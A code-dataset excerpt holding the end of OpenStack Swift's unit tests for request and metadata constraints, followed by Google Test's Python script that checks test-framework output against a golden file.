self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertIn('Metadata must be valid UTF-8', resp.body)
headers = {b'X-Container-Meta-\xff': 'foo'}
resp = constraints.check_metadata(Request.blank(
'/', headers=headers), 'container')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertIn('Metadata must be valid UTF-8', resp.body)
# Object's OK; its metadata isn't serialized as JSON
headers = {'X-Object-Meta-Foo': b'\xff'}
self.assertIsNone(constraints.check_metadata(Request.blank(
'/', headers=headers), 'object'))
def test_check_metadata_name_length(self):
name = 'a' * constraints.MAX_META_NAME_LENGTH
headers = {'X-Object-Meta-%s' % name: 'v'}
self.assertEqual(constraints.check_metadata(Request.blank(
'/', headers=headers), 'object'), None)
name = 'a' * (constraints.MAX_META_NAME_LENGTH + 1)
headers = {'X-Object-Meta-%s' % name: 'v'}
resp = constraints.check_metadata(Request.blank(
'/', headers=headers), 'object')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertIn(
('X-Object-Meta-%s' % name).lower(), resp.body.lower())
self.assertIn('Metadata name too long', resp.body)
def test_check_metadata_value_length(self):
value = 'a' * constraints.MAX_META_VALUE_LENGTH
headers = {'X-Object-Meta-Name': value}
self.assertEqual(constraints.check_metadata(Request.blank(
'/', headers=headers), 'object'), None)
value = 'a' * (constraints.MAX_META_VALUE_LENGTH + 1)
headers = {'X-Object-Meta-Name': value}
resp = constraints.check_metadata(Request.blank(
'/', headers=headers), 'object')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertIn('x-object-meta-name', resp.body.lower())
self.assertIn(
str(constraints.MAX_META_VALUE_LENGTH), resp.body)
self.assertIn('Metadata value longer than 256', resp.body)
def test_check_metadata_count(self):
headers = {}
for x in range(constraints.MAX_META_COUNT):
headers['X-Object-Meta-%d' % x] = 'v'
self.assertEqual(constraints.check_metadata(Request.blank(
'/', headers=headers), 'object'), None)
headers['X-Object-Meta-Too-Many'] = 'v'
resp = constraints.check_metadata(Request.blank(
'/', headers=headers), 'object')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertIn('Too many metadata items', resp.body)
def test_check_metadata_size(self):
headers = {}
size = 0
chunk = constraints.MAX_META_NAME_LENGTH + \
constraints.MAX_META_VALUE_LENGTH
x = 0
while size + chunk < constraints.MAX_META_OVERALL_SIZE:
headers['X-Object-Meta-%04d%s' %
(x, 'a' * (constraints.MAX_META_NAME_LENGTH - 4))] = \
'v' * constraints.MAX_META_VALUE_LENGTH
size += chunk
x += 1
self.assertEqual(constraints.check_metadata(Request.blank(
'/', headers=headers), 'object'), None)
# add two more headers in case adding just one falls exactly on the
# limit (eg one header adds 1024 and the limit is 2048)
headers['X-Object-Meta-%04d%s' %
(x, 'a' * (constraints.MAX_META_NAME_LENGTH - 4))] = \
'v' * constraints.MAX_META_VALUE_LENGTH
headers['X-Object-Meta-%04d%s' %
(x + 1, 'a' * (constraints.MAX_META_NAME_LENGTH - 4))] = \
'v' * constraints.MAX_META_VALUE_LENGTH
resp = constraints.check_metadata(Request.blank(
'/', headers=headers), 'object')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertIn('Total metadata too large', resp.body)
def test_check_object_creation_content_length(self):
headers = {'Content-Length': str(constraints.MAX_FILE_SIZE),
'Content-Type': 'text/plain'}
self.assertEqual(constraints.check_object_creation(Request.blank(
'/', headers=headers), 'object_name'), None)
headers = {'Content-Length': str(constraints.MAX_FILE_SIZE + 1),
'Content-Type': 'text/plain'}
resp = constraints.check_object_creation(
Request.blank('/', headers=headers), 'object_name')
self.assertEqual(resp.status_int, HTTP_REQUEST_ENTITY_TOO_LARGE)
headers = {'Transfer-Encoding': 'chunked',
'Content-Type': 'text/plain'}
self.assertEqual(constraints.check_object_creation(Request.blank(
'/', headers=headers), 'object_name'), None)
headers = {'Transfer-Encoding': 'gzip',
'Content-Type': 'text/plain'}
resp = constraints.check_object_creation(Request.blank(
'/', headers=headers), 'object_name')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertIn('Invalid Transfer-Encoding header value', resp.body)
headers = {'Content-Type': 'text/plain'}
resp = constraints.check_object_creation(
Request.blank('/', headers=headers), 'object_name')
self.assertEqual(resp.status_int, HTTP_LENGTH_REQUIRED)
headers = {'Content-Length': 'abc',
'Content-Type': 'text/plain'}
resp = constraints.check_object_creation(Request.blank(
'/', headers=headers), 'object_name')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertIn('Invalid Content-Length header value', resp.body)
headers = {'Transfer-Encoding': 'gzip,chunked',
'Content-Type': 'text/plain'}
resp = constraints.check_object_creation(Request.blank(
'/', headers=headers), 'object_name')
self.assertEqual(resp.status_int, HTTP_NOT_IMPLEMENTED)
def test_check_object_creation_name_length(self):
headers = {'Transfer-Encoding': 'chunked',
'Content-Type': 'text/plain'}
name = 'o' * constraints.MAX_OBJECT_NAME_LENGTH
self.assertEqual(constraints.check_object_creation(Request.blank(
'/', headers=headers), name), None)
name = 'o' * (MAX_OBJECT_NAME_LENGTH + 1)
resp = constraints.check_object_creation(
Request.blank('/', headers=headers), name)
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertIn('Object name length of %d longer than %d' %
(MAX_OBJECT_NAME_LENGTH + 1, MAX_OBJECT_NAME_LENGTH),
resp.body)
def test_check_object_creation_content_type(self):
headers = {'Transfer-Encoding': 'chunked',
'Content-Type': 'text/plain'}
self.assertEqual(constraints.check_object_creation(Request.blank(
'/', headers=headers), 'object_name'), None)
headers = {'Transfer-Encoding': 'chunked'}
resp = constraints.check_object_creation(
Request.blank('/', headers=headers), 'object_name')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertIn('No content type', resp.body)
def test_check_object_creation_bad_content_type(self):
headers = {'Transfer-Encoding': 'chunked',
'Content-Type': '\xff\xff'}
resp = constraints.check_object_creation(
Request.blank('/', headers=headers), 'object_name')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertTrue('Content-Type' in resp.body)
def test_check_object_creation_bad_delete_headers(self):
headers = {'Transfer-Encoding': 'chunked',
'Content-Type': 'text/plain',
'X-Delete-After': 'abc'}
resp = constraints.check_object_creation(
Request.blank('/', headers=headers), 'object_name')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertTrue('Non-integer X-Delete-After' in resp.body)
t = str(int(time.time() - 60))
headers = {'Transfer-Encoding': 'chunked',
'Content-Type': 'text/plain',
'X-Delete-At': t}
resp = constraints.check_object_creation(
Request.blank('/', headers=headers), 'object_name')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertTrue('X-Delete-At in past' in resp.body)
def test_check_delete_headers(self):
# X-Delete-After
headers = {'X-Delete-After': '60'}
resp = constraints.check_delete_headers(
Request.blank('/', headers=headers))
self.assertTrue(isinstance(resp, Request))
self.assertTrue('x-delete-at' in resp.headers)
headers = {'X-Delete-After': 'abc'}
try:
resp = constraints.check_delete_headers(
Request.blank('/', headers=headers))
except HTTPException as e:
self.assertEqual(e.status_int, HTTP_BAD_REQUEST)
self.assertTrue('Non-integer X-Delete-After' in e.body)
else:
self.fail("Should have failed with HTTPBadRequest")
headers = {'X-Delete-After': '60.1'}
try:
resp = constraints.check_delete_headers(
Request.blank('/', headers=headers))
except HTTPException as e:
self.assertEqual(e.status_int, HTTP_BAD_REQUEST)
self.assertTrue('Non-integer X-Delete-After' in e.body)
else:
self.fail("Should have failed with HTTPBadRequest")
headers = {'X-Delete-After': '-1'}
try:
resp = constraints.check_delete_headers(
Request.blank('/', headers=headers))
except HTTPException as e:
self.assertEqual(e.status_int, HTTP_BAD_REQUEST)
self.assertTrue('X-Delete-After in past' in e.body)
else:
self.fail("Should have failed with HTTPBadRequest")
# X-Delete-At
t = str(int(time.time() + 100))
headers = {'X-Delete-At': t}
resp = constraints.check_delete_headers(
Request.blank('/', headers=headers))
self.assertTrue(isinstance(resp, Request))
self.assertTrue('x-delete-at' in resp.headers)
self.assertEqual(resp.headers.get('X-Delete-At'), t)
headers = {'X-Delete-At': 'abc'}
try:
resp = constraints.check_delete_headers(
Request.blank('/', headers=headers))
except HTTPException as e:
self.assertEqual(e.status_int, HTTP_BAD_REQUEST)
self.assertTrue('Non-integer X-Delete-At' in e.body)
else:
self.fail("Should have failed with HTTPBadRequest")
t = str(int(time.time() + 100)) + '.1'
headers = {'X-Delete-At': t}
try:
resp = constraints.check_delete_headers(
Request.blank('/', headers=headers))
except HTTPException as e:
self.assertEqual(e.status_int, HTTP_BAD_REQUEST)
self.assertTrue('Non-integer X-Delete-At' in e.body)
else:
self.fail("Should have failed with HTTPBadRequest")
t = str(int(time.time()))
headers = {'X-Delete-At': t}
try:
resp = constraints.check_delete_headers(
Request.blank('/', headers=headers))
except HTTPException as e:
self.assertEqual(e.status_int, HTTP_BAD_REQUEST)
self.assertTrue('X-Delete-At in past' in e.body)
else:
self.fail("Should have failed with HTTPBadRequest")
t = str(int(time.time() - 1))
headers = {'X-Delete-At': t}
try:
resp = constraints.check_delete_headers(
Request.blank('/', headers=headers))
except HTTPException as e:
self.assertEqual(e.status_int, HTTP_BAD_REQUEST)
self.assertTrue('X-Delete-At in past' in e.body)
else:
self.fail("Should have failed with HTTPBadRequest")
def test_check_delete_headers_sets_delete_at(self):
t = time.time() + 1000
# check delete-at is passed through
headers = {'Content-Length': '0',
'Content-Type': 'text/plain',
'X-Delete-At': str(int(t))}
req = Request.blank('/', headers=headers)
constraints.check_delete_headers(req)
self.assertTrue('X-Delete-At' in req.headers)
self.assertEqual(req.headers['X-Delete-At'], str(int(t)))
# check delete-after is converted to delete-at
headers = {'Content-Length': '0',
'Content-Type': 'text/plain',
'X-Delete-After': '42'}
req = Request.blank('/', headers=headers)
with mock.patch('time.time', lambda: t):
constraints.check_delete_headers(req)
self.assertTrue('X-Delete-At' in req.headers)
expected = str(int(t) + 42)
self.assertEqual(req.headers['X-Delete-At'], expected)
# check delete-after takes precedence over delete-at
headers = {'Content-Length': '0',
'Content-Type': 'text/plain',
'X-Delete-After': '42',
'X-Delete-At': str(int(t) + 40)}
req = Request.blank('/', headers=headers)
with mock.patch('time.time', lambda: t):
constraints.check_delete_headers(req)
self.assertTrue('X-Delete-At' in req.headers)
self.assertEqual(req.headers['X-Delete-At'], expected)
headers = {'Content-Length': '0',
'Content-Type': 'text/plain',
'X-Delete-After': '42',
'X-Delete-At': str(int(t) + 44)}
req = Request.blank('/', headers=headers)
with mock.patch('time.time', lambda: t):
constraints.check_delete_headers(req)
self.assertTrue('X-Delete-At' in req.headers)
self.assertEqual(req.headers['X-Delete-At'], expected)
def test_check_dir(self):
self.assertFalse(constraints.check_dir('', ''))
with mock.patch("os.path.isdir", MockTrue()):
self.assertTrue(constraints.check_dir('/srv', 'foo/bar'))
def test_check_mount(self):
self.assertFalse(constraints.check_mount('', ''))
with mock.patch("swift.common.utils.ismount", MockTrue()):
self.assertTrue(constraints.check_mount('/srv', '1'))
self.assertTrue(constraints.check_mount('/srv', 'foo-bar'))
self.assertTrue(constraints.check_mount(
'/srv', '003ed03c-242a-4b2f-bee9-395f801d1699'))
self.assertFalse(constraints.check_mount('/srv', 'foo bar'))
self.assertFalse(constraints.check_mount('/srv', 'foo/bar'))
self.assertFalse(constraints.check_mount('/srv', 'foo?bar'))
def test_check_float(self):
self.assertFalse(constraints.check_float(''))
self.assertTrue(constraints.check_float('0'))
def test_valid_timestamp(self):
self.assertRaises(HTTPException,
constraints.valid_timestamp,
Request.blank('/'))
self.assertRaises(HTTPException,
constraints.valid_timestamp,
Request.blank('/', headers={
'X-Timestamp': 'asdf'}))
timestamp = utils.Timestamp(time.time())
req = Request.blank('/', headers={'X-Timestamp': timestamp.internal})
self.assertEqual(timestamp, constraints.valid_timestamp(req))
req = Request.blank('/', headers={'X-Timestamp': timestamp.normal})
self.assertEqual(timestamp, constraints.valid_timestamp(req))
def test_check_utf8(self):
unicode_sample = u'\uc77c\uc601'
valid_utf8_str = unicode_sample.encode('utf-8')
invalid_utf8_str = unicode_sample.encode('utf-8')[::-1]
unicode_with_null = u'abc\u0000def'
utf8_with_null = unicode_with_null.encode('utf-8')
for false_argument in [None,
'',
invalid_utf8_str,
unicode_with_null,
utf8_with_null]:
self.assertFalse(constraints.check_utf8(false_argument))
for true_argument in ['this is ascii and utf-8, too',
unicode_sample,
valid_utf8_str]:
self.assertTrue(constraints.check_utf8(true_argument))
def test_check_utf8_non_canonical(self):
self.assertFalse(constraints.check_utf8('\xed\xa0\xbc\xed\xbc\xb8'))
self.assertFalse(constraints.check_utf8('\xed\xa0\xbd\xed\xb9\x88'))
def test_check_utf8_lone_surrogates(self):
self.assertFalse(constraints.check_utf8('\xed\xa0\xbc'))
self.assertFalse(constraints.check_utf8('\xed\xb9\x88'))
def test_validate_bad_meta(self):
req = Request.blank(
'/v/a/c/o',
headers={'x-object-meta-hello':
'ab' * constraints.MAX_HEADER_SIZE})
self.assertEqual(constraints.check_metadata(req, 'object').status_int,
HTTP_BAD_REQUEST)
self.assertIn('x-object-meta-hello', constraints.check_metadata(req,
'object').body.lower())
def test_validate_constraints(self):
c = constraints
self.assertTrue(c.MAX_META_OVERALL_SIZE > c.MAX_META_NAME_LENGTH)
self.assertTrue(c.MAX_META_OVERALL_SIZE > c.MAX_META_VALUE_LENGTH)
self.assertTrue(c.MAX_HEADER_SIZE > c.MAX_META_NAME_LENGTH)
self.assertTrue(c.MAX_HEADER_SIZE > c.MAX_META_VALUE_LENGTH)
def test_check_account_format(self):
req = Request.blank(
'/v/a/c/o',
headers={'X-Copy-From-Account': 'account/with/slashes'})
self.assertRaises(HTTPException,
constraints.check_account_format,
req, req.headers['X-Copy-From-Account'])
req = Request.blank(
'/v/a/c/o',
headers={'X-Copy-From-Account': ''})
self.assertRaises(HTTPException,
constraints.check_account_format,
req, req.headers['X-Copy-From-Account'])
def test_check_container_format(self):
invalid_versions_locations = (
'container/with/slashes',
'', # empty
)
for versions_location in invalid_versions_locations:
req = Request.blank(
'/v/a/c/o', headers={
'X-Versions-Location': versions_location})
try:
constraints.check_container_format(
req, req.headers['X-Versions-Location'])
except HTTPException as e:
self.assertTrue(e.body.startswith('Container name cannot'))
else:
self.fail('check_container_format did not raise error for %r' %
req.headers['X-Versions-Location'])
def test_valid_api_version(self):
version = 'v1'
self.assertTrue(constraints.valid_api_version(version))
version = 'v1.0'
self.assertTrue(constraints.valid_api_version(version))
version = 'v2'
self.assertFalse(constraints.valid_api_version(version))
class TestConstraintsConfig(unittest.TestCase):
def test_default_constraints(self):
for key in constraints.DEFAULT_CONSTRAINTS:
# if there is local over-rides in swift.conf we just continue on
if key in constraints.OVERRIDE_CONSTRAINTS:
continue
# module level attrs (that aren't in OVERRIDE) should have the
# same value as the DEFAULT map
module_level_value = getattr(constraints, key.upper())
self.assertEqual(constraints.DEFAULT_CONSTRAINTS[key],
module_level_value)
def test_effective_constraints(self):
for key in constraints.DEFAULT_CONSTRAINTS:
# module level attrs should always mirror the same value as the
# EFFECTIVE map
module_level_value = getattr(constraints, key.upper())
self.assertEqual(constraints.EFFECTIVE_CONSTRAINTS[key],
module_level_value)
# if there are local over-rides in swift.conf those should be
# reflected in the EFFECTIVE, otherwise we expect the DEFAULTs
self.assertEqual(constraints.EFFECTIVE_CONSTRAINTS[key],
constraints.OVERRIDE_CONSTRAINTS.get(
key, constraints.DEFAULT_CONSTRAINTS[key]))
def test_override_constraints(self):
try:
with tempfile.NamedTemporaryFile() as f:
f.write('[swift-constraints]\n')
# set everything to 1
for key in constraints.DEFAULT_CONSTRAINTS:
f.write('%s = 1\n' % key)
f.flush()
with mock.patch.object(utils, 'SWIFT_CONF_FILE', f.name):
constraints.reload_constraints()
for key in constraints.DEFAULT_CONSTRAINTS:
# module level attrs should all be 1
module_level_value = getattr(constraints, key.upper())
self.assertEqual(module_level_value, 1)
# all keys should be in OVERRIDE
self.assertEqual(constraints.OVERRIDE_CONSTRAINTS[key],
module_level_value)
# module level attrs should always mirror the same value as
# the EFFECTIVE map
self.assertEqual(constraints.EFFECTIVE_CONSTRAINTS[key],
module_level_value)
finally:
constraints.reload_constraints()
def test_reload_reset(self):
try:
with tempfile.NamedTemporaryFile() as f:
f.write('[swift-constraints]\n')
# set everything to 1
for key in constraints.DEFAULT_CONSTRAINTS:
f.write('%s = 1\n' % key)
f.flush()
with mock.patch.object(utils, 'SWIFT_CONF_FILE', f.name):
constraints.reload_constraints()
self.assertTrue(constraints.SWIFT_CONSTRAINTS_LOADED)
self.assertEqual(sorted(constraints.DEFAULT_CONSTRAINTS.keys()),
sorted(constraints.OVERRIDE_CONSTRAINTS.keys()))
# file is now deleted...
with mock.patch.object(utils, 'SWIFT_CONF_FILE', f.name):
constraints.reload_constraints()
# no constraints have been loaded from non-existent swift.conf
self.assertFalse(constraints.SWIFT_CONSTRAINTS_LOADED)
# no constraints are in OVERRIDE
self.assertEqual([], constraints.OVERRIDE_CONSTRAINTS.keys())
# the EFFECTIVE constraints mirror DEFAULT
self.assertEqual(constraints.EFFECTIVE_CONSTRAINTS,
constraints.DEFAULT_CONSTRAINTS)
finally:
constraints.reload_constraints()
if __name__ == '__main__':
unittest.main()
| apache-2.0 |
kbiElude/Emerald | Emerald/gtest-1.6.0/test/gtest_output_test.py | 1733 | 12005 | #!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests the text output of Google C++ Testing Framework.
SYNOPSIS
gtest_output_test.py --build_dir=BUILD/DIR --gengolden
# where BUILD/DIR contains the built gtest_output_test_ file.
gtest_output_test.py --gengolden
gtest_output_test.py
"""
__author__ = 'wan@google.com (Zhanyong Wan)'
import os
import re
import sys
import gtest_test_utils
# The flag for generating the golden file
GENGOLDEN_FLAG = '--gengolden'
CATCH_EXCEPTIONS_ENV_VAR_NAME = 'GTEST_CATCH_EXCEPTIONS'
IS_WINDOWS = os.name == 'nt'
# TODO(vladl@google.com): remove the _lin suffix.
GOLDEN_NAME = 'gtest_output_test_golden_lin.txt'
PROGRAM_PATH = gtest_test_utils.GetTestExecutablePath('gtest_output_test_')
# At least one command we exercise must not have the
# --gtest_internal_skip_environment_and_ad_hoc_tests flag.
COMMAND_LIST_TESTS = ({}, [PROGRAM_PATH, '--gtest_list_tests'])
COMMAND_WITH_COLOR = ({}, [PROGRAM_PATH, '--gtest_color=yes'])
COMMAND_WITH_TIME = ({}, [PROGRAM_PATH,
'--gtest_print_time',
'--gtest_internal_skip_environment_and_ad_hoc_tests',
'--gtest_filter=FatalFailureTest.*:LoggingTest.*'])
COMMAND_WITH_DISABLED = (
{}, [PROGRAM_PATH,
'--gtest_also_run_disabled_tests',
'--gtest_internal_skip_environment_and_ad_hoc_tests',
'--gtest_filter=*DISABLED_*'])
COMMAND_WITH_SHARDING = (
{'GTEST_SHARD_INDEX': '1', 'GTEST_TOTAL_SHARDS': '2'},
[PROGRAM_PATH,
'--gtest_internal_skip_environment_and_ad_hoc_tests',
'--gtest_filter=PassingTest.*'])
GOLDEN_PATH = os.path.join(gtest_test_utils.GetSourceDir(), GOLDEN_NAME)
def ToUnixLineEnding(s):
"""Changes all Windows/Mac line endings in s to UNIX line endings."""
return s.replace('\r\n', '\n').replace('\r', '\n')
def RemoveLocations(test_output):
"""Removes all file location info from a Google Test program's output.
Args:
test_output: the output of a Google Test program.
Returns:
output with all file location info (in the form of
'DIRECTORY/FILE_NAME:LINE_NUMBER: 'or
'DIRECTORY\\FILE_NAME(LINE_NUMBER): ') replaced by
'FILE_NAME:#: '.
"""
return re.sub(r'.*[/\\](.+)(\:\d+|\(\d+\))\: ', r'\1:#: ', test_output)
def RemoveStackTraceDetails(output):
"""Removes all stack traces from a Google Test program's output."""
# *? means "find the shortest string that matches".
return re.sub(r'Stack trace:(.|\n)*?\n\n',
'Stack trace: (omitted)\n\n', output)
def RemoveStackTraces(output):
"""Removes all traces of stack traces from a Google Test program's output."""
# *? means "find the shortest string that matches".
return re.sub(r'Stack trace:(.|\n)*?\n\n', '', output)
def RemoveTime(output):
"""Removes all time information from a Google Test program's output."""
return re.sub(r'\(\d+ ms', '(? ms', output)
def RemoveTypeInfoDetails(test_output):
"""Removes compiler-specific type info from Google Test program's output.
Args:
test_output: the output of a Google Test program.
Returns:
output with type information normalized to canonical form.
"""
# some compilers output the name of type 'unsigned int' as 'unsigned'
return re.sub(r'unsigned int', 'unsigned', test_output)
def NormalizeToCurrentPlatform(test_output):
"""Normalizes platform specific output details for easier comparison."""
if IS_WINDOWS:
# Removes the color information that is not present on Windows.
test_output = re.sub('\x1b\\[(0;3\d)?m', '', test_output)
# Changes failure message headers into the Windows format.
test_output = re.sub(r': Failure\n', r': error: ', test_output)
# Changes file(line_number) to file:line_number.
test_output = re.sub(r'((\w|\.)+)\((\d+)\):', r'\1:\3:', test_output)
return test_output
def RemoveTestCounts(output):
"""Removes test counts from a Google Test program's output."""
output = re.sub(r'\d+ tests?, listed below',
'? tests, listed below', output)
output = re.sub(r'\d+ FAILED TESTS',
'? FAILED TESTS', output)
output = re.sub(r'\d+ tests? from \d+ test cases?',
'? tests from ? test cases', output)
output = re.sub(r'\d+ tests? from ([a-zA-Z_])',
r'? tests from \1', output)
return re.sub(r'\d+ tests?\.', '? tests.', output)
def RemoveMatchingTests(test_output, pattern):
"""Removes output of specified tests from a Google Test program's output.
This function strips not only the beginning and the end of a test but also
all output in between.
Args:
test_output: A string containing the test output.
pattern: A regex string that matches names of test cases or
tests to remove.
Returns:
Contents of test_output with tests whose names match pattern removed.
"""
test_output = re.sub(
r'.*\[ RUN \] .*%s(.|\n)*?\[( FAILED | OK )\] .*%s.*\n' % (
pattern, pattern),
'',
test_output)
return re.sub(r'.*%s.*\n' % pattern, '', test_output)
def NormalizeOutput(output):
"""Normalizes output (the output of gtest_output_test_.exe)."""
output = ToUnixLineEnding(output)
output = RemoveLocations(output)
output = RemoveStackTraceDetails(output)
output = RemoveTime(output)
return output
def GetShellCommandOutput(env_cmd):
"""Runs a command in a sub-process, and returns its output in a string.
Args:
env_cmd: The shell command. A 2-tuple where element 0 is a dict of extra
environment variables to set, and element 1 is a string with
the command and any flags.
Returns:
A string with the command's combined standard and diagnostic output.
"""
# Spawns cmd in a sub-process, and gets its standard I/O file objects.
# Set and save the environment properly.
environ = os.environ.copy()
environ.update(env_cmd[0])
p = gtest_test_utils.Subprocess(env_cmd[1], env=environ)
return p.output
def GetCommandOutput(env_cmd):
"""Runs a command and returns its output with all file location
info stripped off.
Args:
env_cmd: The shell command. A 2-tuple where element 0 is a dict of extra
environment variables to set, and element 1 is a string with
the command and any flags.
"""
# Disables exception pop-ups on Windows.
environ, cmdline = env_cmd
environ = dict(environ) # Ensures we are modifying a copy.
environ[CATCH_EXCEPTIONS_ENV_VAR_NAME] = '1'
return NormalizeOutput(GetShellCommandOutput((environ, cmdline)))
def GetOutputOfAllCommands():
"""Returns concatenated output from several representative commands."""
return (GetCommandOutput(COMMAND_WITH_COLOR) +
GetCommandOutput(COMMAND_WITH_TIME) +
GetCommandOutput(COMMAND_WITH_DISABLED) +
GetCommandOutput(COMMAND_WITH_SHARDING))
test_list = GetShellCommandOutput(COMMAND_LIST_TESTS)
SUPPORTS_DEATH_TESTS = 'DeathTest' in test_list
SUPPORTS_TYPED_TESTS = 'TypedTest' in test_list
SUPPORTS_THREADS = 'ExpectFailureWithThreadsTest' in test_list
SUPPORTS_STACK_TRACES = False
CAN_GENERATE_GOLDEN_FILE = (SUPPORTS_DEATH_TESTS and
SUPPORTS_TYPED_TESTS and
SUPPORTS_THREADS)
class GTestOutputTest(gtest_test_utils.TestCase):
def RemoveUnsupportedTests(self, test_output):
if not SUPPORTS_DEATH_TESTS:
test_output = RemoveMatchingTests(test_output, 'DeathTest')
if not SUPPORTS_TYPED_TESTS:
test_output = RemoveMatchingTests(test_output, 'TypedTest')
test_output = RemoveMatchingTests(test_output, 'TypedDeathTest')
test_output = RemoveMatchingTests(test_output, 'TypeParamDeathTest')
if not SUPPORTS_THREADS:
test_output = RemoveMatchingTests(test_output,
'ExpectFailureWithThreadsTest')
test_output = RemoveMatchingTests(test_output,
'ScopedFakeTestPartResultReporterTest')
test_output = RemoveMatchingTests(test_output,
'WorksConcurrently')
if not SUPPORTS_STACK_TRACES:
test_output = RemoveStackTraces(test_output)
return test_output
def testOutput(self):
output = GetOutputOfAllCommands()
golden_file = open(GOLDEN_PATH, 'rb')
# A mis-configured source control system can cause \r appear in EOL
# sequences when we read the golden file irrespective of an operating
# system used. Therefore, we need to strip those \r's from newlines
# unconditionally.
golden = ToUnixLineEnding(golden_file.read())
golden_file.close()
# We want the test to pass regardless of certain features being
# supported or not.
# We still have to remove type name specifics in all cases.
normalized_actual = RemoveTypeInfoDetails(output)
normalized_golden = RemoveTypeInfoDetails(golden)
if CAN_GENERATE_GOLDEN_FILE:
self.assertEqual(normalized_golden, normalized_actual)
else:
normalized_actual = NormalizeToCurrentPlatform(
RemoveTestCounts(normalized_actual))
normalized_golden = NormalizeToCurrentPlatform(
RemoveTestCounts(self.RemoveUnsupportedTests(normalized_golden)))
# This code is very handy when debugging golden file differences:
if os.getenv('DEBUG_GTEST_OUTPUT_TEST'):
open(os.path.join(
gtest_test_utils.GetSourceDir(),
'_gtest_output_test_normalized_actual.txt'), 'wb').write(
normalized_actual)
open(os.path.join(
gtest_test_utils.GetSourceDir(),
'_gtest_output_test_normalized_golden.txt'), 'wb').write(
normalized_golden)
self.assertEqual(normalized_golden, normalized_actual)
if __name__ == '__main__':
if sys.argv[1:] == [GENGOLDEN_FLAG]:
if CAN_GENERATE_GOLDEN_FILE:
output = GetOutputOfAllCommands()
golden_file = open(GOLDEN_PATH, 'wb')
golden_file.write(output)
golden_file.close()
else:
message = (
"""Unable to write a golden file when compiled in an environment
that does not support all the required features (death tests, typed tests,
and multiple threads). Please generate the golden file using a binary built
with those features enabled.""")
sys.stderr.write(message)
sys.exit(1)
else:
gtest_test_utils.Main()
| mit |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.